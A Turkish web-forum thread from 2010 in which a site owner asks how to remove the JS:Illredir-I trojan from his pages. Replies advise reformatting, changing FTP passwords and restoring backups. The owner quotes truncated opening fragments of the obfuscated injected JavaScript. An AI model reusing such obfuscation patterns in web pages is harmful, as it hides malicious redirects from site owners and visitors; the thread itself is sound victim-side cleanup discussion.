siteme virüs girmis

atakanxx · Tarih: 2010-02-16, 07:20:28 Mesaj konusu: siteme virüs girmis

bikacgündür avast antivirisu programi siteme girisi engelliyor virus oldugu uyarisini veriyor.index.php default.php index.htm ve js dosyalarinda virus kodlarini tesbit ettim.
avastin verdigi bilgiye göre virus ismi

JS:Illredir-I [Trj] ve trojaner oldugu uyarisi geliyor.

index.php,index htm ve default.php dosyalarina

<s>this.E='';function X() {this.m=false;var.... seklinde baslayan bir kodlar yerlesmis

js dosyalarinda ise

th is.s=fa ls e;var h='sfc4rVifpft_'.replace(/[_4fV9]/g, '');var mq=new String();var ......

seklinde baslayan cok uzun bir kod yerlesmis.tek tek sildigim kodlar bir baktim ertesi gün yeniden gelmis..
yedek dosyalar var fakat hosttakileri silip yeniden yüklemenin faydasi olurmu aceba?

internette pek fazla bilgiye ulasamadim.
bu virüsten tamamen kurtulmak icin ne yapmak gerekiyor..sonuc aldiracak gecerli bir cözüm icin yardimci olursaniz sevinirim

Bu Site Google Adsense ile Gelir Elde Ediyor · Tarih: 2025-08-06, 02:56:06 Mesaj konusu: Forum Arası Reklamlar

rache · Tarih: 2010-02-16, 11:46:18 Mesaj konusu:

!!! BURAYI !!! bi incele istersen. ayni sorunu bende kac kere yasamistim....

aspawa · Mesaj: 200+ Kayıt: Mar 05, 2008 Mesajlar: 265

Aynı sorun benmde başıma geldi ilk önce kendi bilgisayarına format at
çünki system32 üzerinden web sitene erişim sağlıyor atmayı düşünmüyorsan nod32 kur çok iyi bir tarama yaptır
bilgisayarındaki uzantılarını sildikten sonra gelelim web sitene sitenin yedeği varsa hiç bir dosyayı alma komple sil hatta host sağlayan kişiye söyle silip tekrardan oluştursun eğer sitenin yedeği yoksa
antivürüs proğramının tüm güncellemelerini yaptıktan sonra bilgisayarına web sitenin dosyalarını ftp den al alırken virüs proğramı zarar görmüş dosyalar için uyarı veririr ve silmeye başlar hiçbir uyarı almıyorsan virüs proğramını değiştir
En sonda tüm web sitene erişim şifrelerinin hepsini değiştir

atakanxx · Tarih: 2010-02-16, 16:13:08 Mesaj konusu:

yardimlariniz icin cok sagolun arkadaslar.dediklerinizi uygulamaya calisacagim.üstesinden gelebilirsem eger bu meretin.host firmasinada haber verecegim

Reis61 · Mesaj: 1+ Kayıt: Jan 10, 2010 Mesajlar: 8

Songunlerde cikan ve sitelere i f r a m e seklinde bulasan virus hakkinda yapmaniz gerekenler kisaca asagidaki gibidir.

1- Oncelikle virus sitenize sizin bilgisayariniz veya sitenize FTP baglantisi yapan bilgisayar vasitasi ile bulasmaktadir.

2- Bundan kurtulmak icin oncelikle bilgisayarinizi Formatlayip ( yeniden kurmak ) Yeniden kurmaniz gerekmektedir.

3- Websitenizin yonetim panelinden giris yaparak FTP sifrelerinizi degistirin.

4- Sitenizde i f r a m e bulasmis adi "Index" olan sayflari bulup temizleyip kaydedin.

Yukarda yazilanlari yapmaniz halinde Bilgisayariniza bulasan bu Spyware'den hem sitenizi hemde sitenizi ziyaret eden kisileri kurtarmis olacaksiniz.

Saygilarimizla,

atakanxx · Tarih: 2010-02-17, 17:20:13 Mesaj konusu:

selamlar resi61
öncelikle tesekkürler

benim sitedeki virüs i f r a m e degil sanirim l.Bu bir genel isimdir belki bilmiyorum ama

<s>var yN="1f1c042a107b271a080f20600a1619126436.... index php,index html ve index htm default htm dosyalarindaki kodlar bu sekilde basliyor

script atmislar yada bulasmis. digeri ise js dosyalarinda ve su sekilde basliyor:

th is.s=fa ls e;var h='sfc4rVifpft_'.replace(/[_4fV9]/g, '');var mq=new String();var ......

bilgisayarimdan bulastigini varsaysam bilgisayarda antivirus programi uyari vermiyor olsa verir sanirim ve sitenin yedek dosyalarnada bulasmasi gerekmez miydi ?yedek dosyalarda virus yok

atakanxx · Tarih: 2010-03-06, 16:58:00 Mesaj konusu:

bütün dosyalari tek tek gözden gecirip virus bulasmis olanlarini yedekle degistirdim.. ftp den baktigimda dosyalarda virus suan icin görünmüyor
ama avast hala virus uyarisi veriyor ve sitenin en altindaki 5-6 cm yüksekliginde beyaz bosluk disinda bir sakatlikta yok.

index.php ler mainfile hepsi temiz görünmesine ragmen en alttaki bu bosluk ve queltextteki bu kodlar nerden kaynaklaniyor olabilir
quel textte görünen virus kodlarini bulamiyorum bitürlü..

kodlar söyle basliyor.
<s>var C;if(C!='' && C!='sp'){C=''};function N() {var v='';var _=new String();var LD='[';var o;if(o!='e' && o!='Y'){o=''};var R=']';var I='replace';var U;if(U!='cw' && U != ''){U=null};var _k=new Date();var J=new String();var y=RegExp;this.P="";var T='g';var wF;if(wF!='g' && wF!='jx'){wF='g'};var H='';var so;if(so!='' && so!='Ln'){so=null};var Sw="";function L(Q,L_){var ly=new Array();

nerden kaynaklaniyor sitenin neresinde hangi dosyada olabilir fikir yazacak bi arkadas olursa sevinirim